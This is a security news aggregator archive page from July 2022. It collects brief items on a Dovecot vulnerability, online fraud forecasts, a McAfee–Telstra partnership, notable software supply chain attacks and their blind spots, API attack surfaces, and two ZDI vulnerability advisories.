UK nuclear regulators step up monitoring of French giant EDF’s cybersecurity measures
Monthly Archives: July 2022
USN-5509-1: Dovecot vulnerability
Julian Brook discovered that Dovecot incorrectly handled multiple passdb
configuration entries. In certain configurations, a remote attacker could
possibly use this issue to escalate privileges.
Online Payment Fraud to Top $343bn Over Next Five Years
Juniper Research predicts online fraud is set to grow despite improving ID verification measures
McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers
McAfee announces a partnership that will grant new and existing Telstra customers easy access to McAfee’s leading security solutions to deliver holistic security and privacy protection through its integrated suite of services including Antivirus, Parental Controls, Identity Protection, Secure VPN and more, to protect and secure multiple devices including mobiles, PCs and laptops. The partnership brings added protection to Telstra’s millions of customers and their devices via McAfee’s intuitive and integrated consumer security platform
“A recent McAfee study found 27% of Australians surveyed reported attempted account theft and 23% had experienced financial account information leaks,” said Pedro Gutierrez, Senior Vice President of Global Sales and Operations at McAfee. “As the proliferation of life online accelerates, we are thrilled to be partnering with Telstra who are showing through this collaboration, a commitment to innovation and to their customers by investing in new infrastructure and technologies that safeguard their mobile and broadband subscribers.
McAfee’s integrated consumer security platform offers a wide array of mobile security solutions to protect customers’ privacy and identity while blocking viruses, malware, spyware, and ransomware attacks. This partnership allows Telstra’s customers to take advantage of these capabilities and protect themselves from additional threats including potential hacks, identity theft and broader gaps in online and mobile security so they can live life confidently online.
“In today’s increasingly connected world the risk of cyber threats continues to grow. To counter the risk, Telstra is committed to providing our customers with the safety and security features needed to protect them online,” said Matthew O’Brien, Cyber Security Executive and Group Owner at Telstra. “This partnership with McAfee helps drive our mission to build a safe and secure connected future where everyone can thrive, and further complements Telstra’s T25 ambition to extend our network leadership position by delivering greater value to our customers.”
To activate Device Security, Telstra customers can simply go in-store, online or to their MyTelstra app. The full suite of McAfee features supported include Antivirus/System Scan, Safe Browsing, Protection Center, Identity Protection, Password Manager, Parental Controls, Protection Score and Secure VPN. All eligible Telstra customers can try Device Security for three months on Telstra, then auto-roll onto $10/month after.
The post McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers appeared first on McAfee Blog.
Nigerian Prison Break
There was a massive prison break in Abuja, Nigeria:
Armed with bombs, Rocket Propelled Grenade (RPGs) and General Purpose Machine Guns (GPMG), the attackers, who arrived at about 10:05 p.m. local time, gained access through the back of the prison, using dynamites to destroy the heavily fortified facility, freeing 600 out of the prison’s 994 inmates, according to the country’s defense minister, Bashir Magashi….
What’s interesting to me is how the defenders got the threat model wrong. That attack isn’t normally associated with a prison break; it sounds more like a military action in a civil war.
5 Common blind spots that make you vulnerable to supply chain attacks
This blog was written by an independent guest blogger.
Over the past several years, hackers have gone from targeting only companies to also targeting their supply chain. One area of particular vulnerability is company software supply chains, which are becoming an increasingly common method of gaining access to valuable business information. A study by Gartner predicted that by 2025, 45% of companies will have experienced a supply chain attack.
Supply chain attacks can come in various ways, whether by malicious code injected into enterprise software or vulnerabilities in software your company uses. To mitigate this risk, companies must learn about the methods used to execute attacks and understand their company’s blind spots.
This article will look at 5 recent software supply chain attacks and how third-party partners can pose a security risk to your company. We’ll make recommendations for how to secure your business against supply chain attacks and how you can engage in early detection to respond to threats before they take down your enterprise.
What is a software supply chain attack?
The CISA or US Cybersecurity and Infrastructure Security Agency defines a software supply chain attack as an attack that “occurs when a cyber threat actor infiltrates a software vendor’s network and employs malicious code to compromise the software before the vendor sends it to their customers. The compromised software then compromises the customer’s data or system.”
A software supply chain includes any company you purchase software from and any open-source software and public repositories from which your developers pull code. It also includes any service organizations that have access to your data. In the aggregate, all of these different suppliers exponentially increase the surface area of a potential attack.
Software supply chain attacks are particularly dangerous because the software supply chain acts as an amplifier for hackers. This means that when one vendor is impacted, hackers can potentially reach any of their customers, giving them greater reach than if they attacked a single target corporation.
Two primary reasons contribute to the danger, according to CISA:
Third-party software products usually require privileged access;
They often require frequent communication between the vendor’s own network and the vendor’s software on customer networks.
Attackers leverage privileged access and a privileged network access channel as their first point of access. Depending on the level of available access, attackers can easily target many devices and levels of an organization. Some industries, like healthcare, are of particular vulnerability because they possess huge volumes of patient data subject to strict compliance regulations and laws.
Five major supply chain attacks
In recent memory, software supply chain attacks have gathered increased attention from the public because of how damaging they can be to a company and its reputation. The Log4j vulnerability demonstrated just how vulnerable companies can be to relying on third-party software, for example. Other high-profile attacks like the SolarWinds SUNBURST attack and Kaseya VSA (REvil) attack also provided painful reminders of how damaging supply chain attacks can be.
The SolarWinds SUNBURST backdoor
On December 13th, 2020, the SUNBURST backdoor was first disclosed. The attack utilized the popular SolarWinds Orion IT monitoring and management suite to develop a trojanized update.
The backdoor targeted services running the Orion software and was aimed at the US Treasury and Commerce Department. It was also noted that Fortune 500 and telecommunications companies, other government agencies, and universities were potentially impacted too.
In this case, the primary blind spot for companies was application servers and their software update pathways. The best course of action against this type of attack is to monitor the device.
Reports indicated that the command control (C&C) domain avsvmcloud[.]com was registered as early as February 26th, 2020. Like other types of supply chain attacks, the SUNBURST backdoor utilized a period of dormancy to avoid attributing aberrant behavior to software updates.
Of particular concern in the SUNBURST backdoor is also that dedicated servers were targeted. Often, these types of servers are less frequently monitored. Preventing SUNBURST backdoor-style attacks requires active monitoring at all levels of a company’s network.
Log4Shell / Log4j Exploit and Open Source Software vulnerabilities
Another concerning type of vulnerability is open source software vulnerabilities. The Log4Shell / Log4j exploit utilized the Java-based Apache utility Log4j. This exploit permitted hackers to execute remote code, including the capability of taking full control over the server. The Log4Shell exploit was a zero-day vulnerability, which means it was discovered before the software vendor was aware of it. Because the exploit was part of an open-source library, any of the 3 billion or more devices that run Java were potentially impacted.
Resolving the Log4Shell exploit and similar vulnerabilities requires having a complete inventory of all networked devices in your network. It means utilizing a system for discovering devices, monitoring for Log4Shell activity, and patching impacted devices as quickly as possible.
Kaseya VSA attack and Managed Services and Software Ransomware
The primary purpose of utilizing supply chain attacks is to exploit supplier vulnerabilities and attack downstream targets. That’s exactly what REvil, the ransomware group, did when they hijacked Kaseya VSA, a remote monitoring and managed services platform for IT systems and their customers.
By attacking a vulnerability in the Kaseya VSA, REvil was able to send ransomware downstream to up to 1,500 companies that were customers of Kaseya VSA.
In this case, the blind spot was internet-facing devices, devices under remote management, and the communication pathways of the managed service provider. The problem was caused by giving the vendor access to internal IT systems. Best practices to avoid a situation like this would be to monitor channels the managed service provider utilizes. Additionally, behavior analysis should track any unexpected behavior and analyze it to stop ransomware.
The Capital One attack and cloud infrastructure security flaws
Not all attacks are well-coordinated endeavors performed by elite hacking groups. Capital One experienced an extensive data breach when an Amazon employee leveraged insider knowledge of Amazon Web Services (AWS) to steal 100 million credit card applications. The attack publicized the dangers of utilizing cloud infrastructure.
The main blind spot with this attack was that utilizing a cloud service provider requires a customer to place vast amounts of trust in their vendor. This arrangement also means accepting the risk that if the cloud provider is compromised, your data may get compromised too. To combat these types of attacks, it’s key to engage in behavioral monitoring of your services and secure the edge of your network.
Bring Your Own Device (BYOD) vulnerabilities and vendor devices
In March of 2022, the globally recognized cybersecurity firm Okta revealed that one of its vendors (Sitel) had experienced a breach via an employee providing customer service functions on a laptop. Although the extent of the breach was limited, with only two Okta authentication systems being accessed, no customer accounts or configuration changes were made. Nonetheless, subcontractor devices and bring your own device policies represent an additional attack vector for attackers.
Unmanaged and unsanctioned devices on your network increase the potential attack surface every time an additional device is added. Companies lack information on which devices are connected, what software they’re running, and what precautions are being taken to protect against malware. Minimizing risk in this area requires creating an asset inventory and limiting access to these rogue devices. Finally, network monitoring and behavioral analysis can be used to stop attacks in their tracks.
Ransomware Attack Hits French Telecoms Firm
La Poste Mobile is urging customers to be vigilant following the incident
Understanding your API attack surface: How to get started
We live in a world of cloud computing, mobile devices and microservices. Nearly every application we interact with is powered by APIs, often many, especially when dealing with the leading cloud service providers (CSPs), mobile applications and microservice environments. This makes APIs a critical part of an organization’s attack surface.
Akamai estimates that roughly 83% of internet traffic is API-based. Other studies such as those from Salt Security state that API attacks increased over 600% from 2021 to 2022, and Gartner predicts that 90% of web-enabled applications will have broader attack surfaces due to exposed API’s. The latest study from Imperva claims that vulnerable APIs are costing organizations between $40 and $70 billion annually.
ZDI-22-962: Trend Micro Maximum Security Out-Of-Bounds Read Information Disclosure Vulnerability
This vulnerability allows local attackers to disclose sensitive information on affected installations of Trend Micro Maximum Security. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
ZDI-22-960: Linux Kernel LightNVM Subsystem Heap-based Overflow Privilege Escalation Vulnerability
This vulnerability allows local attackers to escalate privileges on affected installations of Linux Kernel. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.